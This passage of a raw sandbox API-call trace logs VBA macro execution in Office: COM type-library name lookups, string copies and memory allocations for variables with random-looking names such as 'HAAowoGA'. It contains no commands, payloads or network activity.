| out: lpWideCharStr="_B_var_vDABZcB") returned 15 [0069.264] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.264] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vDABZcB", lHashVal=0x103a70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.264] IUnknown:Release (This=0x665ba50) returned 0xd [0069.264] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.264] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vDABZcB", lHashVal=0x103a70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.264] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.264] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.264] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vDABZcB", lHashVal=0x103a70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.264] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.264] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.264] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vDABZcB", lHashVal=0x103a70, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.264] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.264] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.264] IUnknown:Release (This=0x665ba50) returned 0xd [0069.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11f0e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_vDABZcB") returned 15 [0069.264] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vDABZcB", lHashVal=0x103a70, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x5a004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x5a004200000000, pDummy=0x0) returned 0x0 [0069.265] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80046 | out: _Dst=0x144ec0) returned 0x0 [0069.265] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HAAowoGA", lHashVal=0x10f793, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8006e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HAAowoGA") returned 9 [0069.265] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HAAowoGA", lHashVal=0x10f793, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8006e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HAAowoGA") returned 9 [0069.265] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HAAowoGA", lHashVal=0x10f793, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HAAowoGA") returned 0x10f793 [0069.265] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="HAAowoGA" | out: _Dst="HAAowoGA") returned 0x0 [0069.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="HAAowoGA") returned 9 [0069.265] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.266] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HAAowoGA", lHashVal=0x10f793, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.266] IUnknown:Release (This=0x665ba50) returned 0xd [0069.266] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.266] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HAAowoGA", lHashVal=0x10f793, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.266] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.266] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.266] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HAAowoGA", lHashVal=0x10f793, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.266] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.266] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.266] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HAAowoGA", lHashVal=0x10f793, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.266] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8006e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HAAowoGA") returned 9 [0069.266] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HAAowoGA", lHashVal=0x10f793, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.266] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.266] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8006e | out: _Dst=0x67c2d40) returned 0x0 [0069.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HAAowoGA") returned 0x10cf1c [0069.266] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_HAAowoGA" | out: _Dst="_B_var_HAAowoGA") returned 0x0 [0069.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_HAAowoGA") returned 16 [0069.266] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.266] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HAAowoGA", lHashVal=0x10cf1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.266] IUnknown:Release (This=0x665ba50) returned 0xd [0069.266] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.266] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HAAowoGA", lHashVal=0x10cf1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.267] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.267] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.267] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HAAowoGA", lHashVal=0x10cf1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.267] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.267] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.267] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HAAowoGA", lHashVal=0x10cf1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.267] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.267] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.267] IUnknown:Release (This=0x665ba50) returned 0xd [0069.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11f3e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_HAAowoGA") returned 16 [0069.267] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HAAowoGA", lHashVal=0x10cf1c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x77006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x77006f00000000, pDummy=0x0) returned 0x0 [0069.267] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8006e | out: _Dst=0x144ec0) returned 0x0 [0069.267] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MAAAUADA", lHashVal=0x10ef32, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8009a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAAUADA") returned 9 [0069.268] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MAAAUADA", lHashVal=0x10ef32, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8009a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAAUADA") returned 9 [0069.268] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MAAAUADA", lHashVal=0x10ef32, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAAAUADA") returned 0x10ef32 [0069.268] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="MAAAUADA" | out: _Dst="MAAAUADA") returned 0x0 [0069.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="MAAAUADA") returned 9 [0069.268] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.268] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MAAAUADA", lHashVal=0x10ef32, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.268] IUnknown:Release (This=0x665ba50) returned 0xd [0069.268] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.268] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MAAAUADA", lHashVal=0x10ef32, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.268] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.269] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.269] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MAAAUADA", lHashVal=0x10ef32, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.269] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.269] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.269] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MAAAUADA", lHashVal=0x10ef32, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.269] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8009a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MAAAUADA") returned 9 [0069.269] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MAAAUADA", lHashVal=0x10ef32, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.272] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.272] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8009a | out: _Dst=0x67c2d40) returned 0x0 [0069.273] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MAAAUADA") returned 0x10c6bb [0069.273] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_MAAAUADA" | out: _Dst="_B_var_MAAAUADA") returned 0x0 [0069.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_MAAAUADA") returned 16 [0069.273] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.273] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MAAAUADA", lHashVal=0x10c6bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.273] IUnknown:Release (This=0x665ba50) returned 0xd [0069.273] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.273] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MAAAUADA", lHashVal=0x10c6bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.273] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.273] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.273] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MAAAUADA", lHashVal=0x10c6bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.273] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.273] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.273] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MAAAUADA", lHashVal=0x10c6bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.273] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.273] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.273] IUnknown:Release (This=0x665ba50) returned 0xd [0069.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11f6e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_MAAAUADA") returned 16 [0069.273] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MAAAUADA", lHashVal=0x10c6bb, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0069.273] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8009a | out: _Dst=0x144ec0) returned 0x0 [0069.273] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.274] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.274] IUnknown:Release (This=0x665ba50) returned 0xd [0069.274] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.274] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.274] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.274] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.274] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.274] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.274] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.274] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.274] IUnknown:Release (This=0x665ba50) returned 0xd [0069.274] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.274] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.274] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.274] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.274] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.274] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.274] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.274] IUnknown:Release (This=0x665ba50) returned 0xd [0069.274] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.274] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.275] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.275] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.275] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.275] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.275] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.275] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.275] IUnknown:Release (This=0x665ba50) returned 0xd [0069.275] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.275] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.275] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.275] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.275] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.275] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.275] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.275] IUnknown:Release (This=0x665ba50) returned 0xd [0069.275] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.275] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.275] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.275] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.275] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.275] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.276] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.276] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.276] IUnknown:Release (This=0x665ba50) returned 0xd [0069.276] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.276] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.276] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.276] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.276] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.276] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.276] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.276] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.276] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.276] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.276] IUnknown:Release (This=0x665ba50) returned 0xd [0069.276] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, 